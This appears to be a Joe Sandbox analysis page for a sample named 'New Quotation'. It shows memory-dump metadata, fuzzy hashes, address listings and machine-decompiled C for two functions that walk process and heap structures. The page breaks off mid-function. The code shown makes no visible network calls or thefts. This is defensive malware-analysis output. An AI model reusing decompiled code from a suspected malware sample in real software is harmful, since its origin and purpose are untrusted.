                                                                                                                                                                                          0x1d858200
                                                                                                                                                                                          0x1d858203
                                                                                                                                                                                          0x1d858208
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d858216
                                                                                                                                                                                          0x1d858225
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d858225
                                                                                                                                                                                          0x1d858185
                                                                                                                                                                                          0x1d858189
                                                                                                                                                                                          0x1d85819c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85819c
                                                                                                                                                                                          0x1d858123
                                                                                                                                                                                          0x1d858125
                                                                                                                                                                                          0x1d858129
                                                                                                                                                                                          0x1d85813c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d858147
                                                                                                                                                                                          0x1d858158
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d858158
                                                                                                                                                                                          0x1d85806d
                                                                                                                                                                                          0x1d8580c4
                                                                                                                                                                                          0x1d8580da
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8580da
                                                                                                                                                                                          0x1d85806f
                                                                                                                                                                                          0x1d858087
                                                                                                                                                                                          0x1d85808f
                                                                                                                                                                                          0x1d8580b2
                                                                                                                                                                                          0x1d8580b2
                                                                                                                                                                                          0x1d8580b5
                                                                                                                                                                                          0x1d8580b7
                                                                                                                                                                                          0x1d8580bd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8580bf
                                                                                                                                                                                          0x1d8580a9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8580af
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8580af
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85806f
                                                                                                                                                                                          0x1d857f44
                                                                                                                                                                                          0x1d857f5c
                                                                                                                                                                                          0x1d857f6d
                                                                                                                                                                                          0x1d857f7e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d857f9b
                                                                                                                                                                                          0x1d857f9b
                                                                                                                                                                                          0x1d857f9e
                                                                                                                                                                                          0x1d857fa0
                                                                                                                                                                                          0x1d857fa2
                                                                                                                                                                                          0x1d857fa7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d857fad
                                                                                                                                                                                          0x1d857fb0
                                                                                                                                                                                          0x1d857fb0
                                                                                                                                                                                          0x1d857fb6
                                                                                                                                                                                          0x1d857ff5
                                                                                                                                                                                          0x1d857ff8
                                                                                                                                                                                          0x1d857ffe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d858004
                                                                                                                                                                                          0x1d858013
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85803b
                                                                                                                                                                                          0x1d85803b
                                                                                                                                                                                          0x1d85803e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85803e
                                                                                                                                                                                          0x1d858013
                                                                                                                                                                                          0x1d857fbc
                                                                                                                                                                                          0x1d857fcb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d857fef
                                                                                                                                                                                          0x1d857fef
                                                                                                                                                                                          0x1d857ff2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d857ff2
                                                                                                                                                                                          0x1d858041
                                                                                                                                                                                          0x1d858043
                                                                                                                                                                                          0x1d858044
                                                                                                                                                                                          0x1d858046
                                                                                                                                                                                          0x1d858047
                                                                                                                                                                                          0x1d85804a
                                                                                                                                                                                          0x1d85804d
                                                                                                                                                                                          0x1d858050
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d857fb0
                                                                                                                                                                                          0x1d857f7e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d857f5c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d857f24
                                                                                                                                                                                          0x1d857ef7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d857ee9
                                                                                                                                                                                          0x1d857ee9
                                                                                                                                                                                          0x1d858241
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d858241

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 82ba5b9f8610eb304a18b85e88e5207c24ca6e5808f40511664fe3833c6a2461
                                                                                                                                                                                          • Instruction ID: c5d85d2d32d6280dbb1e59502862036e0d21621e2f5e560f796c926b2282afa0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 82ba5b9f8610eb304a18b85e88e5207c24ca6e5808f40511664fe3833c6a2461
                                                                                                                                                                                          • Instruction Fuzzy Hash: 83B19378A00245AFDF24DF58CD40EBBB7BAEF84304F10846EBA469B690DB35E905CB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7F0D01 Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E1D7F0D01(intOrPtr __ecx) {
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t160;
				signed int _t162;
				signed int _t164;
				signed int _t168;
				signed int _t170;
				void* _t192;
				signed int _t195;
				intOrPtr _t196;
				signed int _t202;
				void* _t203;
				signed int _t206;
				signed int _t208;
				signed int _t212;
				signed int _t216;
				intOrPtr _t217;
				signed int _t220;
				void* _t223;
				signed int _t226;
				signed int _t228;
				intOrPtr _t230;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t237;
				signed int _t240;
				void* _t242;
				void* _t245;
				void* _t247;

				_push(0x70);
				_push(0x1d8ac3f8);
				E1D827C40(_t192, _t237, _t242);
				 *((intOrPtr*)(_t245 - 0x68)) = __ecx;
				if( *0x1d8c5c80 == 0) {
					L4:
					_t134 = 0;
					goto L5;
				} else {
					if(E1D7DE4B0( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t245 - 0x58, _t245 - 0x54) < 0) {
						 *((intOrPtr*)(_t245 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t245 - 0x54)) != 0) {
						_t194 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
						 *((intOrPtr*)(_t245 - 0x48)) =  *((intOrPtr*)( *[fs:0x30] + 0x18));
						 *(_t245 - 0x64) = 0;
						 *(_t245 - 0x6c) = 0;
						 *(_t245 - 0x5c) = 0;
						L1D7E2330( *[fs:0x30], 0x1d8c6718);
						_t140 =  *0x1d8c5c80; // 0x8
						__eflags = _t140 - 1;
						if(__eflags != 0) {
							_t202 = 0xc;
							_t203 = _t245 - 0x40;
							_t142 = E1D804CF8(_t203, _t140 * _t202, _t140 * _t202 >> 0x20);
							 *(_t245 - 0x44) = _t142;
							__eflags = _t142;
							if(_t142 < 0) {
								L50:
								E1D7E24D0(0x1d8c6718);
								_t134 =  *(_t245 - 0x44);
								L5:
								 *[fs:0x0] =  *((intOrPtr*)(_t245 - 0x10));
								return _t134;
							}
							_push(_t203);
							_t223 = 0x10;
							_t204 =  *(_t245 - 0x40);
							_t145 = E1D7C94A3( *(_t245 - 0x40), _t223);
							 *(_t245 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1d8c5d78; // 0x0
							_t240 = E1D7E5D90(_t204, _t194, _t146 + 0xc0000,  *(_t245 - 0x40));
							 *(_t245 - 0x5c) = _t240;
							__eflags = _t240;
							if(_t240 == 0) {
								_t149 = 0xc0000017;
								 *(_t245 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t245 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t245 - 0x60) = _t240;
								_t150 =  *0x1d8c5c90; // 0x11
								 *(_t245 - 0x4c) = _t150;
								_push(_t245 - 0x74);
								_push(_t245 - 0x39);
								_push(_t245 - 0x58);
								_t195 = E1D801796(_t194,  *((intOrPtr*)(_t245 - 0x54)),  *((intOrPtr*)(_t245 - 0x68)), _t240, 0, __eflags);
								 *(_t245 - 0x44) = _t195;
								__eflags = _t195;
								if(_t195 < 0) {
									L30:
									E1D7E24D0(0x1d8c6718);
									__eflags = _t240 - _t245 - 0x38;
									if(_t240 != _t245 - 0x38) {
										_t241 =  *((intOrPtr*)(_t245 - 0x48));
										E1D7E3BC0( *((intOrPtr*)(_t245 - 0x48)), 0, _t240);
									} else {
										_t241 =  *((intOrPtr*)(_t245 - 0x48));
									}
									__eflags =  *(_t245 - 0x6c);
									if( *(_t245 - 0x6c) != 0) {
										E1D7E3BC0(_t241, 0,  *(_t245 - 0x6c));
									}
									__eflags = _t195;
									if(_t195 >= 0) {
										goto L4;
									} else {
										_t134 = _t195;
										goto L5;
									}
								}
								_t206 =  *0x1d8c5c80; // 0x8
								 *(_t240 + 8) = _t206;
								__eflags =  *((char*)(_t245 - 0x39));
								if( *((char*)(_t245 - 0x39)) != 0) {
									 *((intOrPtr*)(_t240 + 4)) = 1;
									 *(_t240 + 0xc) =  *(_t245 - 0x4c);
									_t160 =  *0x1d8c5c90; // 0x11
									 *(_t245 - 0x4c) = _t160;
								} else {
									 *((intOrPtr*)(_t240 + 4)) = 0;
									 *(_t240 + 0xc) =  *(_t245 - 0x58);
								}
								 *((intOrPtr*)(_t245 - 0x54)) = E1D801715( *((intOrPtr*)(_t245 - 0x74)), _t245 - 0x70);
								_t226 = 0;
								 *(_t245 - 0x40) = 0;
								 *(_t245 - 0x50) = 0;
								while(1) {
									_t162 =  *(_t240 + 8);
									__eflags = _t226 - _t162;
									if(_t226 >= _t162) {
										break;
									}
									_t230 =  *0x1d8c5d78; // 0x0
									_t216 = E1D7E5D90( *((intOrPtr*)(_t245 - 0x54)) + 1,  *((intOrPtr*)(_t245 - 0x48)), _t230 + 0xc0000,  *(_t245 - 0x70) +  *((intOrPtr*)(_t245 - 0x54)) + 1);
									 *(_t245 - 0x78) = _t216;
									__eflags = _t216;
									if(_t216 == 0) {
										L52:
										_t195 = 0xc0000017;
										L19:
										 *(_t245 - 0x44) = _t195;
										L20:
										_t208 =  *(_t245 - 0x40);
										__eflags = _t208;
										if(_t208 == 0) {
											L26:
											__eflags = _t195;
											if(_t195 < 0) {
												E1D7C7CF1( *((intOrPtr*)(_t245 - 0x68)), _t245 - 0x6c);
												__eflags =  *((char*)(_t245 - 0x39));
												if( *((char*)(_t245 - 0x39)) != 0) {
													 *0x1d8c5c90 =  *0x1d8c5c90 - 8;
												}
											} else {
												_t168 =  *(_t245 - 0x64);
												__eflags = _t168;
												if(_t168 != 0) {
													 *0x1d8c5c80 =  *0x1d8c5c80 - _t168;
												}
											}
											__eflags = _t195;
											if(_t195 >= 0) {
												 *((short*)( *((intOrPtr*)(_t245 - 0x68)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t228 = _t208 * 0xc;
										__eflags = _t228;
										_t196 =  *((intOrPtr*)(_t245 - 0x48));
										do {
											 *(_t245 - 0x40) = _t208 - 1;
											_t228 = _t228 - 0xc;
											 *(_t245 - 0x4c) = _t228;
											__eflags =  *(_t240 + _t228 + 0x10) & 0x00000002;
											if(( *(_t240 + _t228 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t240 + _t228 + 0x10) & 0x00000001;
												if(( *(_t240 + _t228 + 0x10) & 0x00000001) == 0) {
													 *(_t245 - 0x64) =  *(_t245 - 0x64) + 1;
													_t212 =  *(_t228 +  *(_t245 - 0x60) + 0x14);
													__eflags =  *((char*)(_t245 - 0x39));
													if( *((char*)(_t245 - 0x39)) == 0) {
														_t170 = _t212;
													} else {
														 *(_t245 - 0x50) =  *(_t212 +  *(_t245 - 0x58) * 4);
														E1D7E3BC0(_t196, 0, _t212 - 8);
														_t170 =  *(_t245 - 0x50);
													}
													L36:
													E1D7E3BC0(_t196, 0,  *((intOrPtr*)(_t170 - 4)));
													L37:
													_t208 =  *(_t245 - 0x40);
													_t228 =  *(_t245 - 0x4c);
													goto L24;
												}
												 *0x1d8c5c84 =  *0x1d8c5c84 + 1;
												goto L24;
											}
											_t170 =  *(_t228 +  *(_t245 - 0x60) + 0x14);
											__eflags = _t170;
											if(_t170 != 0) {
												__eflags =  *((char*)(_t245 - 0x39));
												if( *((char*)(_t245 - 0x39)) != 0) {
													E1D80B6C9(_t170,  *((intOrPtr*)(_t240 + _t228 + 0x18)));
													goto L37;
												}
												goto L36;
											}
											L24:
											__eflags = _t208;
										} while (_t208 != 0);
										_t195 =  *(_t245 - 0x44);
										goto L26;
									}
									_t234 =  *(_t245 - 0x70) + 0x00000001 + _t216 &  !( *(_t245 - 0x70));
									 *(_t245 - 0x7c) = _t234;
									 *(_t234 - 4) = _t216;
									 *((intOrPtr*)(_t245 - 4)) = 0;
									E1D8188C0(_t234,  *((intOrPtr*)( *((intOrPtr*)(_t245 - 0x74)) + 8)),  *((intOrPtr*)(_t245 - 0x54)));
									_t247 = _t247 + 0xc;
									 *((intOrPtr*)(_t245 - 4)) = 0xfffffffe;
									_t217 =  *((intOrPtr*)(_t245 - 0x48));
									__eflags = _t195;
									if(_t195 < 0) {
										E1D7E3BC0(_t217, 0,  *(_t245 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t245 - 0x39));
									if( *((char*)(_t245 - 0x39)) != 0) {
										_t235 = E1D80174A( *(_t245 - 0x4c));
										 *(_t245 - 0x50) = _t235;
										__eflags = _t235;
										if(_t235 == 0) {
											E1D7E3BC0( *((intOrPtr*)(_t245 - 0x48)), 0,  *(_t245 - 0x78));
											goto L52;
										}
										 *(_t235 +  *(_t245 - 0x58) * 4) =  *(_t245 - 0x7c);
										L17:
										_t236 =  *(_t245 - 0x40);
										_t220 = _t236 * 0xc;
										 *(_t220 +  *(_t245 - 0x60) + 0x14) =  *(_t245 - 0x50);
										 *((intOrPtr*)(_t220 + _t240 + 0x10)) = 0;
										_t226 = _t236 + 1;
										 *(_t245 - 0x40) = _t226;
										 *(_t245 - 0x50) = _t226;
										_t195 =  *(_t245 - 0x44);
										continue;
									}
									 *(_t245 - 0x50) =  *(_t245 - 0x7c);
									goto L17;
								}
								 *_t240 = 0;
								_t164 = 0x10 + _t162 * 0xc;
								__eflags = _t164;
								_push(_t164);
								_push(_t240);
								_push("true");
								_push(0xffffffff);
								_t195 = E1D812B70();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t240 = _t245 - 0x38;
						 *(_t245 - 0x5c) = _t240;
						goto L8;
					}
					goto L4;
				}
			}






































                                                                                                                                                                                          0x1d7f0d01
                                                                                                                                                                                          0x1d7f0d03
                                                                                                                                                                                          0x1d7f0d08
                                                                                                                                                                                          0x1d7f0d0d
                                                                                                                                                                                          0x1d7f0d17
                                                                                                                                                                                          0x1d7f0d3c
                                                                                                                                                                                          0x1d7f0d3c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0d19
                                                                                                                                                                                          0x1d7f0d31
                                                                                                                                                                                          0x1d7f0d33
                                                                                                                                                                                          0x1d7f0d33
                                                                                                                                                                                          0x1d7f0d3a
                                                                                                                                                                                          0x1d7f0d54
                                                                                                                                                                                          0x1d7f0d57
                                                                                                                                                                                          0x1d7f0d5a
                                                                                                                                                                                          0x1d7f0d5d
                                                                                                                                                                                          0x1d7f0d62
                                                                                                                                                                                          0x1d7f0d6a
                                                                                                                                                                                          0x1d7f0d6f
                                                                                                                                                                                          0x1d7f0d74
                                                                                                                                                                                          0x1d7f0d77
                                                                                                                                                                                          0x1d7f0f6f
                                                                                                                                                                                          0x1d7f0f74
                                                                                                                                                                                          0x1d7f0f77
                                                                                                                                                                                          0x1d7f0f7c
                                                                                                                                                                                          0x1d7f0f7f
                                                                                                                                                                                          0x1d7f0f81
                                                                                                                                                                                          0x1d83a05f
                                                                                                                                                                                          0x1d83a064
                                                                                                                                                                                          0x1d83a069
                                                                                                                                                                                          0x1d7f0d3e
                                                                                                                                                                                          0x1d7f0d41
                                                                                                                                                                                          0x1d7f0d4d
                                                                                                                                                                                          0x1d7f0d4d
                                                                                                                                                                                          0x1d7f0f89
                                                                                                                                                                                          0x1d7f0f8c
                                                                                                                                                                                          0x1d7f0f8d
                                                                                                                                                                                          0x1d7f0f90
                                                                                                                                                                                          0x1d7f0f95
                                                                                                                                                                                          0x1d7f0f98
                                                                                                                                                                                          0x1d7f0f9a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0fa0
                                                                                                                                                                                          0x1d7f0fb4
                                                                                                                                                                                          0x1d7f0fb6
                                                                                                                                                                                          0x1d7f0fb9
                                                                                                                                                                                          0x1d7f0fbb
                                                                                                                                                                                          0x1d83a052
                                                                                                                                                                                          0x1d83a057
                                                                                                                                                                                          0x1d7f0fc1
                                                                                                                                                                                          0x1d7f0fc1
                                                                                                                                                                                          0x1d7f0fc1
                                                                                                                                                                                          0x1d7f0fc4
                                                                                                                                                                                          0x1d7f0fc6
                                                                                                                                                                                          0x1d7f0d83
                                                                                                                                                                                          0x1d7f0d83
                                                                                                                                                                                          0x1d7f0d86
                                                                                                                                                                                          0x1d7f0d8b
                                                                                                                                                                                          0x1d7f0d91
                                                                                                                                                                                          0x1d7f0d95
                                                                                                                                                                                          0x1d7f0d99
                                                                                                                                                                                          0x1d7f0da5
                                                                                                                                                                                          0x1d7f0da7
                                                                                                                                                                                          0x1d7f0daa
                                                                                                                                                                                          0x1d7f0dac
                                                                                                                                                                                          0x1d7f0ef6
                                                                                                                                                                                          0x1d7f0efb
                                                                                                                                                                                          0x1d7f0f03
                                                                                                                                                                                          0x1d7f0f05
                                                                                                                                                                                          0x1d7f0fd3
                                                                                                                                                                                          0x1d7f0fd7
                                                                                                                                                                                          0x1d7f0f0b
                                                                                                                                                                                          0x1d7f0f0b
                                                                                                                                                                                          0x1d7f0f0b
                                                                                                                                                                                          0x1d7f0f0e
                                                                                                                                                                                          0x1d7f0f12
                                                                                                                                                                                          0x1d83a141
                                                                                                                                                                                          0x1d83a141
                                                                                                                                                                                          0x1d7f0f18
                                                                                                                                                                                          0x1d7f0f1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0f20
                                                                                                                                                                                          0x1d83a14b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83a14b
                                                                                                                                                                                          0x1d7f0f1a
                                                                                                                                                                                          0x1d7f0db2
                                                                                                                                                                                          0x1d7f0db8
                                                                                                                                                                                          0x1d7f0dbb
                                                                                                                                                                                          0x1d7f0dbf
                                                                                                                                                                                          0x1d7f0fe1
                                                                                                                                                                                          0x1d7f0feb
                                                                                                                                                                                          0x1d7f0fee
                                                                                                                                                                                          0x1d7f0ff3
                                                                                                                                                                                          0x1d7f0dc5
                                                                                                                                                                                          0x1d7f0dc5
                                                                                                                                                                                          0x1d7f0dcb
                                                                                                                                                                                          0x1d7f0dcb
                                                                                                                                                                                          0x1d7f0dd9
                                                                                                                                                                                          0x1d7f0ddc
                                                                                                                                                                                          0x1d7f0dde
                                                                                                                                                                                          0x1d7f0de1
                                                                                                                                                                                          0x1d7f0de4
                                                                                                                                                                                          0x1d7f0de4
                                                                                                                                                                                          0x1d7f0de7
                                                                                                                                                                                          0x1d7f0de9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0def
                                                                                                                                                                                          0x1d7f0e0e
                                                                                                                                                                                          0x1d7f0e10
                                                                                                                                                                                          0x1d7f0e13
                                                                                                                                                                                          0x1d7f0e15
                                                                                                                                                                                          0x1d83a07d
                                                                                                                                                                                          0x1d83a07d
                                                                                                                                                                                          0x1d7f0e9c
                                                                                                                                                                                          0x1d7f0e9c
                                                                                                                                                                                          0x1d7f0e9f
                                                                                                                                                                                          0x1d7f0e9f
                                                                                                                                                                                          0x1d7f0ea2
                                                                                                                                                                                          0x1d7f0ea4
                                                                                                                                                                                          0x1d7f0ed3
                                                                                                                                                                                          0x1d7f0ed3
                                                                                                                                                                                          0x1d7f0ed5
                                                                                                                                                                                          0x1d83a121
                                                                                                                                                                                          0x1d83a126
                                                                                                                                                                                          0x1d83a12a
                                                                                                                                                                                          0x1d83a130
                                                                                                                                                                                          0x1d83a130
                                                                                                                                                                                          0x1d7f0edb
                                                                                                                                                                                          0x1d7f0edb
                                                                                                                                                                                          0x1d7f0ede
                                                                                                                                                                                          0x1d7f0ee0
                                                                                                                                                                                          0x1d83a110
                                                                                                                                                                                          0x1d83a110
                                                                                                                                                                                          0x1d7f0ee0
                                                                                                                                                                                          0x1d7f0ee6
                                                                                                                                                                                          0x1d7f0ee8
                                                                                                                                                                                          0x1d7f0ef2
                                                                                                                                                                                          0x1d7f0ef2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0ee8
                                                                                                                                                                                          0x1d7f0ea6
                                                                                                                                                                                          0x1d7f0ea6
                                                                                                                                                                                          0x1d7f0ea9
                                                                                                                                                                                          0x1d7f0eac
                                                                                                                                                                                          0x1d7f0ead
                                                                                                                                                                                          0x1d7f0eb0
                                                                                                                                                                                          0x1d7f0eb3
                                                                                                                                                                                          0x1d7f0eb6
                                                                                                                                                                                          0x1d7f0ebb
                                                                                                                                                                                          0x1d83a0cb
                                                                                                                                                                                          0x1d83a0d0
                                                                                                                                                                                          0x1d83a0dd
                                                                                                                                                                                          0x1d83a0e3
                                                                                                                                                                                          0x1d83a0e7
                                                                                                                                                                                          0x1d83a0eb
                                                                                                                                                                                          0x1d83a109
                                                                                                                                                                                          0x1d83a0ed
                                                                                                                                                                                          0x1d83a0f3
                                                                                                                                                                                          0x1d83a0fc
                                                                                                                                                                                          0x1d83a101
                                                                                                                                                                                          0x1d83a101
                                                                                                                                                                                          0x1d7f0f2b
                                                                                                                                                                                          0x1d7f0f30
                                                                                                                                                                                          0x1d7f0f35
                                                                                                                                                                                          0x1d7f0f35
                                                                                                                                                                                          0x1d7f0f38
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0f38
                                                                                                                                                                                          0x1d83a0d2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83a0d2
                                                                                                                                                                                          0x1d7f0ec4
                                                                                                                                                                                          0x1d7f0ec8
                                                                                                                                                                                          0x1d7f0eca
                                                                                                                                                                                          0x1d7f0f25
                                                                                                                                                                                          0x1d7f0f29
                                                                                                                                                                                          0x1d7f0f66
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0f66
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0f29
                                                                                                                                                                                          0x1d7f0ecc
                                                                                                                                                                                          0x1d7f0ecc
                                                                                                                                                                                          0x1d7f0ecc
                                                                                                                                                                                          0x1d7f0ed0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0ed0
                                                                                                                                                                                          0x1d7f0e25
                                                                                                                                                                                          0x1d7f0e27
                                                                                                                                                                                          0x1d7f0e2a
                                                                                                                                                                                          0x1d7f0e2d
                                                                                                                                                                                          0x1d7f0e3a
                                                                                                                                                                                          0x1d7f0e3f
                                                                                                                                                                                          0x1d7f0e42
                                                                                                                                                                                          0x1d7f0e49
                                                                                                                                                                                          0x1d7f0e4c
                                                                                                                                                                                          0x1d7f0e4e
                                                                                                                                                                                          0x1d83a0c1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83a0c1
                                                                                                                                                                                          0x1d7f0e54
                                                                                                                                                                                          0x1d7f0e58
                                                                                                                                                                                          0x1d7f0f45
                                                                                                                                                                                          0x1d7f0f47
                                                                                                                                                                                          0x1d7f0f4a
                                                                                                                                                                                          0x1d7f0f4c
                                                                                                                                                                                          0x1d83a078
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83a078
                                                                                                                                                                                          0x1d7f0f58
                                                                                                                                                                                          0x1d7f0e64
                                                                                                                                                                                          0x1d7f0e64
                                                                                                                                                                                          0x1d7f0e67
                                                                                                                                                                                          0x1d7f0e70
                                                                                                                                                                                          0x1d7f0e74
                                                                                                                                                                                          0x1d7f0e78
                                                                                                                                                                                          0x1d7f0e79
                                                                                                                                                                                          0x1d7f0e7c
                                                                                                                                                                                          0x1d7f0e7f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0e7f
                                                                                                                                                                                          0x1d7f0e61
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0e61
                                                                                                                                                                                          0x1d7f0e87
                                                                                                                                                                                          0x1d7f0e8c
                                                                                                                                                                                          0x1d7f0e8c
                                                                                                                                                                                          0x1d7f0e8f
                                                                                                                                                                                          0x1d7f0e90
                                                                                                                                                                                          0x1d7f0e91
                                                                                                                                                                                          0x1d7f0e93
                                                                                                                                                                                          0x1d7f0e9a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0fcc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0fcc
                                                                                                                                                                                          0x1d7f0fc6
                                                                                                                                                                                          0x1d7f0d7d
                                                                                                                                                                                          0x1d7f0d80
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0d80
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0d3a

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d57d4ec65565049c08ced5dbff3a925f34c0b577fc12a2780276802adeebd139
                                                                                                                                                                                          • Instruction ID: b36fd57923f0db462b710f3237c3562821f6a4d9704980cfcae28504c810b530
                                                                                                                                                                                          • Opcode Fuzzy Hash: d57d4ec65565049c08ced5dbff3a925f34c0b577fc12a2780276802adeebd139
                                                                                                                                                                                          • Instruction Fuzzy Hash: 52C15D74E04259EFCB26CF98C884B9EBBB5FF48754F10412AE519AB351D770E841CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7F8FFB Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E1D7F8FFB(void* __ecx, char __edx, signed int* _a4, signed int* _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int* _a24, signed int* _a28) {
				char _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void* _t74;
				intOrPtr _t91;
				signed int _t93;
				void* _t94;
				intOrPtr _t97;
				signed int _t99;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t106;
				signed int _t108;
				intOrPtr _t113;
				signed int _t115;
				intOrPtr _t120;
				signed int _t122;
				void* _t125;
				signed int* _t126;
				char _t131;
				char _t133;
				char _t138;
				intOrPtr _t149;
				intOrPtr* _t152;
				void* _t153;

				_v6 = __edx;
				_t125 = __ecx;
				_v12 = 0;
				 *_a16 = 0;
				_v5 = 0;
				 *_a8 = 0;
				 *_a28 = 0;
				_t152 = _a4;
				 *_a12 = 0;
				 *_a20 = 0;
				 *_t152 = 0;
				_t149 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t131 = 0x48;
				if(__ecx == 0) {
					L11:
					_t153 = E1D7F9194(_t125, _a24);
					if(_t153 < 0) {
						L15:
						_t126 = _a28;
						L25:
						_t68 = _a4;
						if( *_a4 != 0) {
							E1D7E3BC0(_t149, 0,  *_t68);
							 *_a4 =  *_a4 & 0x00000000;
						}
						_t69 = _a20;
						if( *_a20 != 0) {
							E1D7E3BC0(_t149, 0,  *_t69);
							 *_a20 =  *_a20 & 0x00000000;
						}
						_t70 = _a8;
						if( *_a8 != 0) {
							E1D7E3BC0(_t149, 0,  *_t70);
							 *_a8 =  *_a8 & 0x00000000;
						}
						_t71 = _a12;
